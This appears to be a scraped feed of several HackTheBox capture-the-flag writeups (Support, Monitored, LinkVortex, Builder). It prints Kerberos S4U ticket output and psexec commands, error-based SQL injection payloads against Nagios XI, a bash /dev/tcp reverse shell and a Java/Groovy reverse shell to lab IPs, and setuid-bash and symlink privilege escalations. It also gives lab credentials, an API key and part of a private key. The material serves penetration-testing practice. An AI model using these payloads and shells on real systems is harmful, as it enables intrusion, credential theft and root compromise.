PZVm99gYu8zYUGXTTFcTwGC58wX1DOHXbeh1b2mDsYfgAPbsoaA72oCn1c61W1vVOikWpt9P3vbtB7OO Ix+BvO2nVaDW8KH+6VFizPqdVqiurQujIa5nJhYCgTP3oqsRY9sneT3vBOlWm4n7gaOB1jCB06ADAgEA ooHLBIHIfYHFMIHCoIG/MIG8MIG5oBswGaADAgEXoRIEELg9Z4UKVkODw7JfCn7XV2WhDRsLU1VQUE9S VC5IVEKiGjAYoAMCAQqhETAPGw1hZG1pbmlzdHJhdG9yowcDBQBAoQAApREYDzIwMjYwMjI1MTE0OTI5 WqYRGA8yMDI2MDIyNTIxNDkyOFqnERgPMjAyNjAzMDQxMTQ5MjhaqA0bC1NVUFBPUlQuSFRCqR4wHKAD AgEBoRUwExsRMHhkZkZha2VDb21wdXRlciQ= [*] Impersonating user \u0026#39;administrator\u0026#39; to target SPN \u0026#39;cifs/dc.support.htb\u0026#39; [*] Building S4U2proxy request for service: \u0026#39;cifs/dc.support.htb\u0026#39; [*] Using domain controller: dc.support.htb (::1) [*] Sending S4U2proxy request to domain controller ::1:88 [+] S4U2proxy success! [*] base64(ticket.kirbi) for SPN \u0026#39;cifs/dc.support.htb\u0026#39;: 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 I’ll grab the last ticket Rubeus generated, and copy it back to my machine, saving it as ticket.kirbi.b64, making sure to remove all spaces. 
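Rubeus prints three base64 blobs in a row (the TGT for the fake computer, the S4U2self ticket and the S4U2proxy ticket) and only the last one is the service ticket for cifs/dc.support.htb, so before converting anything it is worth confirming which blob ended up in the file. The Python below is an added example, not code from this writeup or from Impacket: clean_b64() does what the :%s/ //g substitution does (and also drops the line breaks Rubeus inserts), kirbi_tickets() decodes the KRB-CRED and walks the DER only as far as each ticket realm and service principal name, and is_ticket_for() is the yes/no check. sample_kirbi() is a constructed, crypto-free KRB-CRED used only so the script runs offline; its field layout follows RFC 4120 section 5.8.1 but it is my own minimal rendering, not a real ticket.

```python
import base64
import sys

# --- minimal DER helpers (single-byte tags, short and long length forms) ---
def der_read(buf, pos=0):
    # returns (tag, content, position just after this element)
    tag = buf[pos]
    length = buf[pos + 1]
    pos += 2
    if length & 0x80:                       # long form: the next N bytes hold the length
        n = length & 0x7F
        length = int.from_bytes(buf[pos:pos + n], 'big')
        pos += n
    return tag, buf[pos:pos + length], pos + length

def der_children(content):
    # split the content of a constructed element into (tag, content) pairs
    out, pos = [], 0
    while pos < len(content):
        tag, val, pos = der_read(content, pos)
        out.append((tag, val))
    return out

def der(tag, payload):
    # encoder, used only to build the offline sample below
    n = len(payload)
    if n < 0x80:
        ln = bytes([n])
    else:
        lb = n.to_bytes((n.bit_length() + 7) // 8, 'big')
        ln = bytes([0x80 | len(lb)]) + lb
    return bytes([tag]) + ln + payload

# --- the actual check ---
def clean_b64(blob):
    # what :%s/ //g does, plus newlines: Rubeus wraps the base64 and a paste may add spaces
    return ''.join(blob.split())

def kirbi_tickets(blob):
    # walk a KRB-CRED and return [(realm, 'service/host'), ...], one entry per embedded ticket
    raw = base64.b64decode(clean_b64(blob))
    tag, body, _ = der_read(raw)
    if tag != 0x76:                         # [APPLICATION 22] constructed = 0x60 | 22
        raise ValueError('not a KRB-CRED, first tag is 0x%02x' % tag)
    _, seq, _ = der_read(body)
    fields = dict(der_children(seq))        # [0] pvno, [1] msg-type, [2] tickets, [3] enc-part
    _, tickets, _ = der_read(fields[0xA2])
    out = []
    for _, tkt in der_children(tickets):    # each is an [APPLICATION 1] Ticket
        _, tseq, _ = der_read(tkt)
        tf = dict(der_children(tseq))       # [0] tkt-vno, [1] realm, [2] sname, [3] enc-part
        realm = der_read(tf[0xA1])[1].decode()
        _, pname, _ = der_read(tf[0xA2])
        pf = dict(der_children(pname))      # [0] name-type, [1] name-string
        _, names, _ = der_read(pf[0xA1])
        out.append((realm, '/'.join(v.decode() for _, v in der_children(names))))
    return out

def is_ticket_for(blob, spn):
    # True only if the blob holds a ticket whose sname is exactly this SPN (realm not compared)
    return any(sname.lower() == spn.lower() for _, sname in kirbi_tickets(blob))

def sample_kirbi(realm, service, host):
    # constructed, crypto-free KRB-CRED with one ticket so the script runs offline;
    # the enc-part fields carry a single dummy cipher byte, which is all the walker needs
    ctx = lambda n, p: der(0xA0 + n, p)
    gstr = lambda s: der(0x1B, s.encode())
    integer = lambda i: der(0x02, bytes([i]))
    pname = der(0x30, ctx(0, integer(2)) + ctx(1, der(0x30, gstr(service) + gstr(host))))
    encdata = der(0x30, ctx(0, integer(0)) + ctx(2, der(0x04, bytes([0]))))
    ticket = der(0x61, der(0x30, ctx(0, integer(5)) + ctx(1, gstr(realm))
                               + ctx(2, pname) + ctx(3, encdata)))
    cred = der(0x30, ctx(0, integer(5)) + ctx(1, integer(22))
                     + ctx(2, der(0x30, ticket)) + ctx(3, encdata))
    return base64.b64encode(der(0x76, cred)).decode()

if __name__ == '__main__':
    data = '' if sys.stdin.isatty() else sys.stdin.read()
    blob = data.strip() or sample_kirbi('SUPPORT.HTB', 'cifs', 'dc.support.htb')
    for realm, sname in kirbi_tickets(blob):
        print(realm, sname)
```

Saved as, say, kirbi_check.py and run with ticket.kirbi.b64 on stdin it prints one line per ticket: the S4U2proxy blob reports SUPPORT.HTB cifs/dc.support.htb, the first blob reports krbtgt/SUPPORT.HTB, and the S4U2self blob reports the fake computer name itself, matching the Rubeus output above. Run without input it falls back to the constructed sample.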
I’ll base64 decode it into ticket.kirbi (in vim, :%s/ //g strips the spaces first), convert it to a ccache and use it with Kerberos auth; the ticket is for cifs/dc.support.htb, so it is good for SMB-based tooling such as psexec, while a WinRM login would have needed a different SPN:\n:%s/ //g base64 -d ticket.kirbi.b64 \u0026gt; ticket.kirbi /home/kali/Desktop/Tools/ACTIVEDIRECTORY/ticketConverter.py ticket.kirbi ticket.ccache KRB5CCNAME=ticket.ccache \u0026#34;/home/kali/Desktop/Tools/ACTIVEDIRECTORY/psexec.py\u0026#34; support.htb/administrator@dc.support.htb -k -no-pass or impacket-psexec ","date":"23 February 2026","externalUrl":null,"permalink":"/ctf-writeups/support/","section":"CTF Writeups","summary":"","title":"Support","type":"ctf-writeups"},{"content":" Monitored # Overview # OS: Linux IP: 10.10.10.10 Difficulty: Medium Platform: HackTheBox OSCP: Yes Lists: N/A Summary # Found creds in snmpwalk output, used the API to get a session token for a disabled account, used error-based SQLi to pull the admin API key and the API to create a user, ran a manipulated check from the monitoring service to get the shell, and escalated through sudo -l.\nLoot # Loot Category Details Usernames root@monitored.htb (SNMP contact), svc, nagiosadmin Passwords XjH7VCehowpR1xZB Usernames+Passwords svc:XjH7VCehowpR1xZB Hashes Service Versions Nagios XI 5.11 API key nagiosadmin:IudGPHd9pEKiee9MkJ7ggPD89q3YndctnPeRQOmS2PQ7QIrbJEomFVG6Eut9CHLL\nEnumeration # Nmap # Not shown: 980 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0) | ssh-hostkey: | 3072 61:e2:e7:b4:1b:5d:46:dc:3b:2f:91:38:e6:6d:c5:ff (RSA) | 256 29:73:c5:a5:8d:aa:3f:60:a9:4a:a3:e5:9f:67:5c:93 (ECDSA) |_ 256 6d:7a:f9:eb:8e:45:c2:02:6a:d5:8d:4d:b3:a3:37:6f (ED25519) 80/tcp open http Apache httpd 2.4.56 |_http-title: Did not follow redirect to https://nagios.monitored.htb/ |_http-server-header: Apache/2.4.56 (Debian) 89/tcp filtered su-mit-tg 139/tcp filtered netbios-ssn 212/tcp filtered anet 389/tcp open ldap OpenLDAP 2.2.X - 2.3.X 443/tcp open ssl/https Apache/2.4.56 (Debian) | tls-alpn: |_ http/1.1 | ssl-cert: Subject: commonName=nagios.monitored.htb/organizationName=Monitored/stateOrProvinceName=Dorset/countryName=UK | Not valid before: 2023-11-11T21:46:55 |_Not valid after: 2297-08-25T21:46:55 |_http-title: Nagios XI 
|_ssl-date: TLS randomness does not represent time |_http-server-header: Apache/2.4.56 (Debian) 541/tcp filtered uucp-rlogin 625/tcp filtered apple-xsrvr-admin 705/tcp filtered agentx 1034/tcp filtered zincite-a 1062/tcp filtered veracity 1123/tcp filtered murray 1296/tcp filtered dproxy 5822/tcp filtered unknown 6100/tcp filtered synchronet-db 6667/tcp filtered irc 8002/tcp filtered teradataordbms 9618/tcp filtered condor 16001/tcp filtered fmsascon Device type: general purpose|router Running: Linux 5.X, MikroTik RouterOS 7.X OS CPE: cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3 OS details: Linux 5.0 - 5.14, MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3) Network Distance: 2 hops Service Info: Host: nagios.monitored.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel Dirbusting # Nothing useful Nmap —\u0026gt; Nagios subdomain # └─$ nmap nagios.monitored.htb -sU --min-rate=20000 Starting Nmap 7.95 ( https://nmap.org ) at 2026-02-22 07:06 EST Nmap scan report for nagios.monitored.htb (10.129.230.96) Host is up (0.17s latency). 
rDNS record for 10.129.230.96: monitored.htb Not shown: 994 open|filtered udp ports (no-response) PORT STATE SERVICE 123/udp open ntp **161/udp open snmp** 18807/udp closed unknown 21625/udp closed unknown 25003/udp closed icl-twobase4 49169/udp closed unknown 2/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0) | ssh-hostkey: | 3072 61:e2:e7:b4:1b:5d:46:dc:3b:2f:91:38:e6:6d:c5:ff (RSA) | 256 29:73:c5:a5:8d:aa:3f:60:a9:4a:a3:e5:9f:67:5c:93 (ECDSA) |_ 256 6d:7a:f9:eb:8e:45:c2:02:6a:d5:8d:4d:b3:a3:37:6f (ED25519) 80/tcp open http Apache httpd 2.4.56 |_http-title: Did not follow redirect to https://nagios.monitored.htb |_http-server-header: Apache/2.4.56 (Debian) **389/tcp open ldap OpenLDAP 2.2.X - 2.3.X** 443/tcp open ssl/http Apache httpd 2.4.56 |_ssl-date: TLS randomness does not represent time |_http-server-header: Apache/2.4.56 (Debian) | tls-alpn: |_ http/1.1 |_http-title: Nagios XI | ssl-cert: Subject: commonName=nagios.monitored.htb/organizationName=Monitored/stateOrProvinceName=Dorset/countryName=UK | Not valid before: 2023-11-11T21:46:55 |_Not valid after: 2297-08-25T21:46:55 Device type: general purpose|router Running: Linux 5.X, MikroTik RouterOS 7.X OS CPE: cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3 OS details: Linux 5.0 - 5.14, MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3) Network Distance: 2 hops Service Info: Hosts: nagios.monitored.htb, 127.0.0.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel LDAP # └─$ ldapsearch -H ldap://nagios.monitored.htb -x -s base namingcontexts ## extended LDIF # ## LDAPv3 ## base \u0026lt;\u0026gt; (default) with scope baseObject ## filter: (objectclass=*) ## requesting: namingcontexts # # dn: namingContexts: dc=monitored,dc=htb ## search result search: 2 result: 0 Success ====================================================================================== ## numResponses: 2 ## numEntries: 1 ldapsearch -x -H ldap://10.129.230.96 -b \u0026#34;dc=monitored,dc=htb\u0026#34; 
\u0026#34;(objectClass=*)\u0026#34; ## extended LDIF # ## LDAPv3 ## base \u0026lt;dc=monitored,dc=htb\u0026gt; with scope subtree ## filter: (objectClass=*) ## requesting: ALL # ## monitored.htb dn: dc=monitored,dc=htb objectClass: top objectClass: dcObject objectClass: organization o: monitored.htb dc: monitored ## search result search: 2 result: 0 Success ## numResponses: 2 ## numEntries: 1 (anonymous bind only returns the base entry, so nothing more from LDAP) SNMP # let\u0026#39;s do an snmpwalk with the default public community\n└─$ snmpwalk -v2c -c public 10.129.230.96 iso.3.6.1.2.1.1.1.0 = STRING: \u0026#34;Linux monitored 5.10.0-28-amd64 #1 SMP Debian 5.10.209-2 (2024-01-31) x86_64\u0026#34; iso.3.6.1.2.1.1.2.0 = OID: iso.3.6.1.4.1.8072.3.2.10 iso.3.6.1.2.1.1.3.0 = Timeticks: (253220) 0:42:12.20 iso.3.6.1.2.1.1.4.0 = STRING: \u0026#34;Me \u0026lt;root@monitored.htb\u0026gt;\u0026#34; iso.3.6.1.2.1.1.5.0 = STRING: \u0026#34;monitored\u0026#34; iso.3.6.1.2.1.1.6.0 = STRING: \u0026#34;Sitting on the Dock of the Bay\u0026#34; iso.3.6.1.2.1.1.7.0 = INTEGER: 72 iso.3.6.1.2.1.1.8.0 = Timeticks: (271) 0:00:02.71 iso.3.6.1.2.1.1.9.1.2.1 = OID: iso.3.6.1.6.3.10.3.1.1 iso.3.6.1.2.1.1.9.1.2.2 = OID: iso.3.6.1.6.3.11.3.1.1 .... 
iso.3.6.1.2.1.25.4.2.1.5.588 = \u0026#34;\u0026#34; iso.3.6.1.2.1.25.4.2.1.5.590 = STRING: \u0026#34;-u -s -O /run/wpa_supplicant\u0026#34; iso.3.6.1.2.1.25.4.2.1.5.597 = STRING: \u0026#34;-f\u0026#34; iso.3.6.1.2.1.25.4.2.1.5.621 = STRING: \u0026#34;-c sleep 30; sudo -u svc /bin/bash -c /opt/scripts/check_host.sh svc XjH7VCehowpR1xZB \u0026#34; iso.3.6.1.2.1.25.4.2.1.5.739 = STRING: \u0026#34;-f /usr/local/nagios/etc/pnp/npcd.cfg\u0026#34; iso.3.6.1.2.1.25.4.2.1.5.745 = STRING: \u0026#34;-LOw -f -p /run/snmptrapd.pid\u0026#34; iso.3.6.1.2.1.25.4.2.1.5.752 = STRING: \u0026#34;-LOw -u Debian-snmp -g Debian-snmp -I -smux mteTrigger mteTriggerConf -f -p /run/snmpd.pi (1.3.6.1.2.1.25.4.2.1.5 is hrSWRunParameters, the command line arguments of every running process, which is why a password passed as a script argument leaks to anyone who knows the community string) this could be a potential account, so let\u0026#39;s add it to our loot: svc/XjH7VCehowpR1xZB\nPort 80 # Homepage # ok so Nagios XI is an IT infrastructure monitoring product: it runs checks against servers, network devices, applications and services and alerts by email or SMS when a check fails.\nlogin.php # Exploitation # So now that we have the creds for svc, they don\u0026#39;t seem to work on the portal because of a user disabled error, so let\u0026#39;s check if there is any API endpoint we can get in through (had to refer to ippsec for this)\n/nagiosxi/api/v1/authenticate # the API still issues a token for the disabled account, and on giving our token to the login page, boom, we are in\nNagios XI 5.11 (SQLi) # On searching this version we find this SQLi blog\nThe injection used below is the id parameter of the acknowledge_banner_message action, which any authenticated user can reach; that is CVE-2023-40931, the one the linked blog covers. Its sibling CVE-2023-40933 is the same class of bug in update_banner_message() and is described as: A SQL injection vulnerability in Nagios XI v5.11.1 and below allows authenticated attackers with announcement banner configuration privileges to execute arbitrary SQL commands via the ID parameter sent to the update_banner_message() function\nhttps://rootsecdev.medium.com/notes-from-the-field-exploiting-nagios-xi-sql-injection-cve-2023-40931-9d5dd6563f8c\nlet\u0026#39;s do the SQLi manually following ippsec\nit is error based: EXTRACTVALUE() evaluates the injected subquery as an XPath expression and MySQL echoes it back inside the XPATH syntax error, so each request leaks one value. Two things to keep in mind: the error only shows the first 32 characters, hence the substring() chunks further down, and concat(0x0a, ...) is prepended so the value starts with a character that can never be valid XPath and nothing at the front gets swallowed.\nPayloads\naction=acknowledge_banner_message\u0026amp;id=1 AND EXTRACTVALUE(1, (select SCHEMA_NAME from INFORMATION_SCHEMA.SCHEMATA)) --\u0026gt; errors with Subquery returns more than 1 row, which already proves the injection action=acknowledge_banner_message\u0026amp;id=1 AND EXTRACTVALUE(1, (select group_concat(SCHEMA_NAME) from INFORMATION_SCHEMA.SCHEMATA)) --\u0026gt; group_concat collapses the rows into one value so the XPATH error can carry it Databases action=acknowledge_banner_message\u0026amp;id=4 AND EXTRACTVALUE(1, concat(0x0a, (select group_concat(SCHEMA_NAME) from INFORMATION_SCHEMA.SCHEMATA))) Table COLUMNS action=acknowledge_banner_message\u0026amp;id=4 AND EXTRACTVALUE(1, concat(0x0a, (select group_concat(TABLE_NAME,COLUMN_NAME) from INFORMATION_SCHEMA.COLUMNS where TABLE_SCHEMA = \u0026#39;nagiosxi\u0026#39;))) Table NAME action=acknowledge_banner_message\u0026amp;id=4 AND EXTRACTVALUE(1, concat(0x0a, (select TABLE_NAME from INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA = \u0026#39;nagiosxi\u0026#39; LIMIT $0$,1))) --\u0026gt; $0$ is the Burp Intruder position, iterated over 0, 1, 2, ... to walk the tables one per request action=acknowledge_banner_message\u0026amp;id=4 AND EXTRACTVALUE(1, concat(0x0a, (select COLUMN_NAME from INFORMATION_SCHEMA.COLUMNS where TABLE_SCHEMA = \u0026#39;nagiosxi\u0026#39; and TABLE_NAME = \u0026#39;xi_users\u0026#39; LIMIT 0,1))) Data enum action=acknowledge_banner_message\u0026amp;id=4 AND EXTRACTVALUE(1, concat(0x0a, (select username from xi_users LIMIT 0,1))) --\u0026gt; nagiosadmin action=acknowledge_banner_message\u0026amp;id=4 AND EXTRACTVALUE(1, concat(0x0a, (select substring(api_key,1,28) from xi_users LIMIT 0,1))) action=acknowledge_banner_message\u0026amp;id=4 AND EXTRACTVALUE(1, concat(0x0a, (select substring(api_key,29,56) from xi_users LIMIT 0,1))) action=acknowledge_banner_message\u0026amp;id=4 AND EXTRACTVALUE(1, concat(0x0a, (select substring(api_key,57,70) from xi_users LIMIT 0,1))) --\u0026gt; the three chunks together give the 64 character api_key of nagiosadmin; the second and third substring() lengths are larger than needed, but the 32 character cap on the error message trims them, so you just overlap the pieces at offsets 1, 29 and 57 Now we just register ourselves (create a new admin user through the API) with the API key we got\nRev Shell # Easiest way in these monitoring 
services is to run a check that we manipulate\nnow let\u0026#39;s run it\nDoes not seem to work; found out that I forgot to exec, as in it should have been\n[nagios@monitored ~]$ bash -c \u0026#39;bash -i \u0026gt;\u0026amp; /dev/tcp/10.10.14.66/1234 0\u0026gt;\u0026amp;1\u0026#39; (Nagios hands check commands to /bin/sh, which on Debian is dash and understands neither \u0026gt;\u0026amp; nor /dev/tcp, so the reverse shell only works once it is wrapped in bash -c) Shell as nagios # I didn\u0026#39;t really understand the privesc part of this, will check it later\nmv nagios nagios.bk x.sh #!/bin/bash cp /bin/bash /tmp/0xdf chown root:root /tmp/0xdf chmod 6777 /tmp/0xdf cp /tmp/x.sh nagios chmod +x nagios sudo /usr/local/nagiosxi/scripts/manage_services.sh restart nagios ls -la /tmp/0xdf /tmp/0xdf -p What the chain does: sudo -l lets the nagios user run manage_services.sh as root, that script restarts the nagios service, and the service starts the nagios binary, which the nagios user can replace (the mv and cp above succeed). Swapping the binary for x.sh therefore makes root execute the script on restart; it copies bash to /tmp/0xdf and marks the copy setuid root (4755 would do, 6777 also makes it world-writable), and /tmp/0xdf -p starts that bash without dropping the effective uid.\n","date":"22 February 2026","externalUrl":null,"permalink":"/ctf-writeups/monitored/","section":"CTF Writeups","summary":"","title":"Monitored","type":"ctf-writeups"},{"content":"","date":"21 February 2026","externalUrl":null,"permalink":"/tags/lains-list/","section":"Tags","summary":"","title":"Lains-List","type":"tags"},{"content":" LinkVortex # Overview # OS: Linux IP: 10.129.231.194 Difficulty: Easy Platform: HackTheBox OSCP: Yes Lists: TJNull, Lain\u0026rsquo;s List Summary # Enumeration uncovered a DEV subdomain exposing a .git directory. Dumping the repository revealed valid Ghost CMS credentials, which gave authenticated access to the admin panel. Since the target was running Ghost 5.58, I used CVE-2023-40028 to read sensitive files and recover credentials for another user. From there, I logged in as bob over SSH and abused a vulnerable sudo symlink-cleaning script to read root-owned files.\nLoot # Category Details Usernames admin@linkvortex.htb, bob@linkvortex.htb Passwords OctopiFociPilfer45, thisissupersafe, fibber-talented-worth Credentials admin@linkvortex.htb:OctopiFociPilfer45, bob@linkvortex.htb:fibber-talented-worth Service Versions Ghost 5.58 Enumeration # Nmap # Starting Nmap 7.95 ( https://nmap.org ) at 2026-02-21 07:40 EST ... Dirbusting # 301 GET ... ... Web (Port 80) # Homepage # The web root looked like a normal blog-style site at first glance. 
Nothing obvious was exposed here, but it strongly suggested a CMS-backed application.\nCMS Detection # Further checks confirmed the backend was Ghost CMS, which is important because version-specific Ghost vulns are well documented.\nRobots.txt # User-agent: * Disallow: /ghost/ The /ghost/ path is the Ghost admin endpoint, so this was a direct lead.\nGhost Admin Panel # Browsing to /ghost/ reached the login portal.\nRSS Feed # The RSS data confirmed the instance was running Ghost 5.58, a vulnerable version for authenticated arbitrary file read.\nSubdomain Discovery # A new subdomain was identified during enumeration. Since it was not publicly resolvable, it was added to /etc/hosts for direct interaction.\nDEV Subdomain # The DEV host expanded the attack surface and quickly became the more interesting target.\n.git Exposure # The DEV site exposed a .git directory. That usually means source history leakage and potential credential disclosure.\nThe repository was dumped using gitdumper for offline review.\nGit Analysis # Commit history exposed a password update:\n- password = \u0026#39;thisissupersafe\u0026#39; + password = \u0026#39;OctopiFociPilfer45\u0026#39; This gave valid Ghost admin credentials.\nExploitation # Ghost 5.58 - Arbitrary File Read (CVE-2023-40028) # The target version was vulnerable to authenticated file read:\nhttps://github.com/0xDTC/Ghost-5.58-Arbitrary-File-Read-CVE-2023-40028\nExploit Execution # ./CVE-2023-40028 -u admin@linkvortex.htb -p OctopiFociPilfer45 -h http://linkvortex.htb/ This confirmed arbitrary file read worked with the recovered admin credentials.\nReading System Files # /etc/passwd Reading /etc/passwd validated file access on the target.\nExtracting Credentials # /var/lib/ghost/config.production.json Recovered credentials:\nbob@linkvortex.htb fibber-talented-worth SSH Access # ssh bob@linkvortex.htb Using the credentials from config.production.json, I gained a shell as bob.\nPrivilege Escalation # Sudo Permissions # (ALL) 
NOPASSWD: /usr/bin/bash /opt/ghost/clean_symlink.sh *.png Vulnerability # clean_symlink.sh did not safely validate symlink targets, making it possible to pivot a permitted .png path into protected files.\nExploit # ln -s /root/root.txt /home/bob/.cache/b ln -s /home/bob/.cache/b /home/bob/.cache/a.png CHECK_CONTENT=true sudo bash /opt/ghost/clean_symlink.sh /home/bob/.cache/a.png This abuse chain allowed reading root-owned content through the allowed sudo command.\nRoot Access # Key Takeaways # Exposed .git repositories can leak sensitive credentials via commit history. Old credentials can remain visible even after password rotations. Ghost 5.58 is vulnerable to authenticated arbitrary file read (CVE-2023-40028). Application config files often contain high-value credentials. Poor symlink handling in sudo-allowed scripts can lead to privilege escalation. ","date":"21 February 2026","externalUrl":null,"permalink":"/ctf-writeups/linkvortex/","section":"CTF Writeups","summary":"","title":"LinkVortex","type":"ctf-writeups"},{"content":"","date":"21 February 2026","externalUrl":null,"permalink":"/tags/tjnull/","section":"Tags","summary":"","title":"Tjnull","type":"tags"},{"content":" Builder # Overview # OS: Linux IP: 10.129.230.220 Difficulty: Medium Platform: HackTheBox OSCP: Yes Lists: N/A Summary # old jenkins interface got creds with hydra and LFI that exposed creds under users.xml, grabbed root ssh key and decrypted it with the CLI.\nLoot # Takeaways Category Details Usernames+Passwords jennifer:princess Hashes jennifer #jbcrypt:$2a$10$UwR7BpEH.ccfpi1tv6w/XuBtS44S7oUpR2JYiobqxcDQJeN/L4l1a |\nEnumeration # I started broad, validated each finding, and then focused only on paths that were reproducible.\nnmap dirb sub 80 Exploitation # using the LFI we found\nim clueless, i know there is a user called jennifer but idk the name of the file that contains the password ahh let me check with gpt if not i mighthave to refer to the writeup\nok so lets check the users.xml 
file\njennifer_12108429903186576833\nthere is this, lets check the directory under and view the config xml for the hash\nwe get princess as the password\nalternatively we could have just used hydra\nOR\nburp\nanyways now that we are in lets look for where we can upload our reverse shell\nhttps://blog.pentesteracademy.com/abusing-jenkins-groovy-script-console-to-get-shell-98b951fa64a6\nusing this blog we will try to get\nString host=\u0026#34;10.10.15.208\u0026#34;; int port=8044; String cmd=\u0026#34;/bin/bash\u0026#34;; Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()\u0026gt;0)so.write(pi.read());while(pe.available()\u0026gt;0)so.write(pe.read());while(si.available()\u0026gt;0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close(); and we have our shell\non searching we find this on stack overflow\ninteresting lets check the source and see if we can get\n{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} lets use this to decrypt\nprintln( hudson.util.Secret.decrypt(\u0026#34;${ENCRYPTED_PASSPHRASE_OR_PASSWORD}\u0026#34;) ) println( hudson.util.Secret.decrypt(\u0026#34;{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}\u0026#34;) ) boom we have this\n-----BEGIN OPENSSH PRIVATE KEY----- b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn NhAAAAAwEAAQAAAYEAt3G9oUyouXj/0CLya9Wz7Vs31bC4rdvgv7n9PCwrApm8PmGCSLgv Up2m70MKGF5e+s1KZZw7gQbVHRI0U+2t/u8A5dJJsU9DVf9w54N08IjvPK/cgFEYcyRXWA EYz0+41fcDjGyzO9dlNlJ/w2NRP2xFg4+vYxX+tpq6G5Fnhhd5mCwUyAu7VKw4cVS36CNx vqAC/KwFA8y0/s24T1U/sTj2xTaO3wlIrdQGPhfY0wsuYIVV3gHGPyY8bZ2HDdES5vDRpo Fzwi85aNunCzvSQrnzpdrelqgFJc3UPV8s4yaL9JO3+s+akLr5YvPhIWMAmTbfeT3BwgMD 
